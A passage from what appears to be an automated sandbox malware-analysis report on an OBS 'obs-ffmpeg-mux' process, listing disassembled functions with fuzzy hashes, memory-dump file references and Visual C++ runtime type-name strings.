Opcode Fuzzy Hash: f50bf9d45b07f9fed7a8078693abee7f23351cad672a747608ffeb063cebe12d
Instruction Fuzzy Hash: 06518F73108AE58AD792DB64D448BED3BA4F71D384FA64471DBAC83712EBB5D890D700

Function 00007FF8A7BE1730 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 860bab9d395cf43ed3b1cf56782110bfed2c0c3dddb8109515e6473b81413bd7
Instruction ID: e33df7ff0de53a4df0c352df232dec682c4ea03755cf591b1af5e47ed5b95cf4
Opcode Fuzzy Hash: 860bab9d395cf43ed3b1cf56782110bfed2c0c3dddb8109515e6473b81413bd7
Instruction Fuzzy Hash: 96518E73508AE186E792DB64D448BEE7BA4F718384FA68471CBEC83702DBA5D990D700

Function 00007FF8A7C033E0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf754ad211c098a8f34c6fa0d70b3b75da22e1392d81fac143d3245663dd1af9
Instruction ID: d62f3ee82f61522c2a5c28bcc0d5e038748908fa788f4fdf90f99940016618ff
Opcode Fuzzy Hash: bf754ad211c098a8f34c6fa0d70b3b75da22e1392d81fac143d3245663dd1af9
Instruction Fuzzy Hash: B741D4A673C0B263F3354B08E001D2EFBA1FB42FC1B54A214DBA416E94C66AD659EF54

Function 00007FF8A7C24330 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b6c65e6f8fbbfa1a7d368a2725116908e408c53695cc2cda4a45b28fc02054
Instruction ID: f1cb3f17c000513af1f2a7fe4f464e8e0a2476b0fa6296fc1f4e410c42510e0b
Opcode Fuzzy Hash: 51b6c65e6f8fbbfa1a7d368a2725116908e408c53695cc2cda4a45b28fc02054
Instruction Fuzzy Hash: 12417E731046648BD301CF2AE980A9AB7E2F398B4CFA5D225DF4257356D739A907CB80

Function 00007FF8A7BEB460 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b83fdb0131200dfce48832797b5ce1ee65e01df28847898595a6ba08a50e8d6
Instruction ID: 9ff78d19f6ad1a3eb3fd0f5dff5c944c6df9c6ed44593c271d71de568142c779
Opcode Fuzzy Hash: 1b83fdb0131200dfce48832797b5ce1ee65e01df28847898595a6ba08a50e8d6
Instruction Fuzzy Hash: A82150E7F3186A07EB78427DEC16F1404C255B977434CE135E906D6F81F42EEA524A83

Function 00007FF8A7C02D20 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9accf3f83477c77ce7ab5b6679156a875be267288f965f0b915796913070d0d7
Instruction ID: 7eed5754b1834e89ad7b281dee9995115732208a055216060500222a49c2bc36
Opcode Fuzzy Hash: 9accf3f83477c77ce7ab5b6679156a875be267288f965f0b915796913070d0d7
Instruction Fuzzy Hash: 1121299B7315F903FB010ABE6D056759982A188BF73499732ECA8E77CDC478DC519290

Function 00007FF8A7C02BF0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a414ea0c491aecb8e1acee4f50acb857c601688e8d49eddf1fb7be55f6bcb7eb
Instruction ID: 7a5d0e89ee220409aea0cd3b8462f96d225d0e593cd00c887ba69c6791ff7a16
Opcode Fuzzy Hash: a414ea0c491aecb8e1acee4f50acb857c601688e8d49eddf1fb7be55f6bcb7eb
Instruction Fuzzy Hash: 7F213E9FF656BA03FB1846AF6C412786280E648BF63489732DDDDE77CAD47C890291D0

Function 00007FF8A7BEC1A0 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f149c23a356f76f238516a0c29d6d6da4b78dcaf03ebe63ea6bb4be2698659
Instruction ID: 4eca7cc1d8becbe433940e1160ffcb59a520695667363a121ec98fb3efea1781
Opcode Fuzzy Hash: 13f149c23a356f76f238516a0c29d6d6da4b78dcaf03ebe63ea6bb4be2698659
Instruction Fuzzy Hash: 7D21B5FBF390A557EB754B2DD400F2C1A41A361BF4698E134C91E83F80E916DA42AF02

Function 00007FF8A7BED700 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e375ad6e9128b21d2b8073199f54bc1e05150e57f45dacb5095166fe167bd8
Instruction ID: 171779ec982a4b95c811b61005e3e378ac16f4dd49ed5def7ee2ace1a9a9b0df
Opcode Fuzzy Hash: b6e375ad6e9128b21d2b8073199f54bc1e05150e57f45dacb5095166fe167bd8
Instruction Fuzzy Hash: F6213673B708AA47D7508779E846F956990E3A1B4CF98E631E715D3E80D13EE093D740

Function 00007FF8A7BED8D0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333bc48ed0cd00a2d1b15b774f25581d7625ddc281499ec81eb7566562b50259
Instruction ID: d2e6b6e738862b8edefd92a4cab8ef1c955b1cae68104d5b19da72838a973db8
Opcode Fuzzy Hash: 333bc48ed0cd00a2d1b15b774f25581d7625ddc281499ec81eb7566562b50259
Instruction Fuzzy Hash: 81116DF3B324B20BD7489AB8CC0A3A932C3D3C8746F9CC534E745CAA89D57CE2529604

Function 00007FF8A7BEB790 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 921da5e6bee8a79c60022e540b3013bc24987b6f10c9384b169f9994f4f13c7f
Instruction ID: 553df05bde8730c2af5b775627e87df25167b30be8e249de382e34d587bfc127
Opcode Fuzzy Hash: 921da5e6bee8a79c60022e540b3013bc24987b6f10c9384b169f9994f4f13c7f
Instruction Fuzzy Hash: B8115EF7F3506A43EB7C055AE826F7905419671BA888CE03DDE0B52F81E81E56415B82

Function 00007FF8A7BEB5C0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c7e682ef6fe0021f165804b69b7812e3084bd1803e36f36abadd25f99cf90a
Instruction ID: d48b2549310a57d9e595f68f9dd508c99bf0721b7a51b100cf290c1c9796cb3c
Opcode Fuzzy Hash: 48c7e682ef6fe0021f165804b69b7812e3084bd1803e36f36abadd25f99cf90a
Instruction Fuzzy Hash: 7711C8D7F3696A47EB604A3DCC42B194182DBE57B178CE431EC09C6F45F83DE6429A42

Function 00007FF8A7BEDEF0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b8c63fbc3d1884eef626a7aef42dd066a5768f9b76b144cbd0180c709170efd
Instruction ID: c6bd132d479d579003d0fe28ad71f0dcfb3dbf22236c1569930e95e4e782629b
Opcode Fuzzy Hash: 5b8c63fbc3d1884eef626a7aef42dd066a5768f9b76b144cbd0180c709170efd
Instruction Fuzzy Hash: 3F1129B2E050915BEB95CB29D458ABC33D1EB84B84FC58136DA058778CE77CE943E790

Function 00007FF8A7BEB8D0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87362e0b0484954b111388de62736d52838e743fda6cb01bb5a4730a87f793d9
Instruction ID: 68929f77910a6eac8f744af91c8fc6a36df83668b6563f2d0cafbdc424f4348f
Opcode Fuzzy Hash: 87362e0b0484954b111388de62736d52838e743fda6cb01bb5a4730a87f793d9
Instruction Fuzzy Hash: E4017CE7F3286943DB64867DCC0670400C396F877178CD031A904C6F89F83EE6418A42

Function 00007FF8A7BEB380 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b36b57bc46747f380974be252968c61105f93df6c2abcd15431a709e92770c1
Instruction ID: 14bd2cacf1174b1c4f3da44626b05ac20a3ec18444f4115fae820648a13c1207
Opcode Fuzzy Hash: 7b36b57bc46747f380974be252968c61105f93df6c2abcd15431a709e92770c1
Instruction Fuzzy Hash: 43F0B7D7F3685A03EB5C456DDC1631401C391E823238DD13ABA47C6B8AF839EA968643

Function 00007FF8A7BE99C0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dde2236b060dd472fafee045e56aa39d7b712360777964fc0ed02c3a9815e90
Instruction ID: bfd3546a5fbb30b6ebab84ceb017d4b00d2b2eaf998771553366fc11d10fd0b9
Opcode Fuzzy Hash: 3dde2236b060dd472fafee045e56aa39d7b712360777964fc0ed02c3a9815e90
Instruction Fuzzy Hash: 28F0AFD9231BB64BEA11A69990D07D69721F30CBC6B70A622DF4D27335CA17A10BCA00

Function 00007FF8BFB88C24 Relevance: 54.6, APIs: 3, Strings: 28, Instructions: 352COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8913D
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB89175
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB891AF

Strings

__int32, xrefs: 00007FF8BFB88EDB
auto, xrefs: 00007FF8BFB88F3F
const, xrefs: 00007FF8BFB88FDD
char8_t, xrefs: 00007FF8BFB88F2D
__int128, xrefs: 00007FF8BFB88EB7
double, xrefs: 00007FF8BFB88D48
__int64, xrefs: 00007FF8BFB88EC9
long , xrefs: 00007FF8BFB88D31
void, xrefs: 00007FF8BFB88D86
int, xrefs: 00007FF8BFB88CCE
long, xrefs: 00007FF8BFB88CBC
char32_t, xrefs: 00007FF8BFB890B7
float, xrefs: 00007FF8BFB88D74
bool, xrefs: 00007FF8BFB89056
UNKNOWN, xrefs: 00007FF8BFB8908D
volatile, xrefs: 00007FF8BFB88FF8
char16_t, xrefs: 00007FF8BFB89065
<unknown>, xrefs: 00007FF8BFB88F1B
volatile, xrefs: 00007FF8BFB89025
__w64 , xrefs: 00007FF8BFB88E3A
wchar_t, xrefs: 00007FF8BFB890A8
decltype(auto), xrefs: 00007FF8BFB890C6
char, xrefs: 00007FF8BFB88CF2
short, xrefs: 00007FF8BFB88CE0
unsigned , xrefs: 00007FF8BFB890FA
__int16, xrefs: 00007FF8BFB88E1C
__int8, xrefs: 00007FF8BFB88E2E
signed , xrefs: 00007FF8BFB8910A

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1388207849
Opcode ID: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
Instruction ID: a3d4887396f8425792d121d257e1f93e13fe2aeb42bf9fec96c1bd4b8e7ecf0c
Opcode Fuzzy Hash: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
Instruction Fuzzy Hash: 37F17072F1861695FB249BACC8942BC27B1BB857C8F408539DB1D16EAADF3DE644C340

Function 00007FF649AA1C50 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 215COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF649AA1C70
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA1C8E
fprintf.MSPDB140-MSVCRT ref: 00007FF649AA1C9E

